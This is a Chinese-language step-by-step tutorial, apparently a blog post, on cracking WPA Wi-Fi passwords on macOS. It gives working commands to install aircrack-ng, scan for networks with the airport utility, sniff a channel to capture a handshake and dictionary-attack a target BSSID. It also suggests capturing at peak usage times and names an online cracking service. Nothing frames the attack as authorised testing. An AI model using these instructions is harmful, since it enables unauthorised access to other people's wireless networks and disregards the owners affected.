第一步，安装macport，安装Xcode

　　安装macport macport 是一个工具管理软件包的一个工具，我们也可以通过别的方式安装Aircrack-ng，但是通过macport安装Aircrack-ng的速度是最快的，（Mac系统要求安装Xcode, 可以参考macport的首页）

　第二步，安装aircrack-ng

sudo port install aircrack-ng

通过ifconfig命令获取当前的网卡的名字，我这边网卡名字为en0：

使用mac系统自带的airport工具，查看当前的无线网络，以及它们的相关信息，在shell中执行：

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s

系统回显如下图，以下为我附近所有的wifi，注意看表格， SSID， BSSID， CHANNEL，这些关键词都会在后面提到：

参数en0是我电脑的默认网卡，数字6是网卡需要监听的网络频道:

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 6

当执行以上命令，开始监听以后， wifi的图标会发生改变，变成一个小眼睛一样的图标：

　　监听久一点，然后使用ctrl+c停止监听，系统会把监听到的数据保存到本地，如下图，数据保存到/tmp/airportSniffdaMCjH.cap 文件中：

　　在监听的过程中如果有用户登陆这个wifi，那么包就会被我们截获，如果用户一直没有登陆到这个wifi，我们就还要继续等待监听，尽量在手机或者手提电脑所用高峰期开启捕获，这样捕获握手（handshake）的几率比较高，具体原理参考最后的链接；

sudo aircrack-ng   /tmp/airportSniff8g0Oex.cap

如果要查询的路由列表的Encryption值为WPA(1 handshake) ，说明抓取成功，否者跳到第六步，要重新抓取：

-b后面的参数bc:46:99:df:6c:72指的是网卡的BSSID，最后面的一个文件路径是上一步监听到的数据

sudo aircrack-ng -w dict.txt -b bc:46:99:df:6c:72 /tmp/airportSniffdaMCjH.cap

只要字典够大，密码破出来应该指日可待，字典可以自己去做，或者网上下载

　　能不能破解主要看脸，看运气

　　破解成功以后，命令行会显示KEY FOUND ：

如果觉的自己弄个字典爆破很麻烦，有些第三方的网站提供免费爆破，或者收费的爆破， https://gpuhash.me/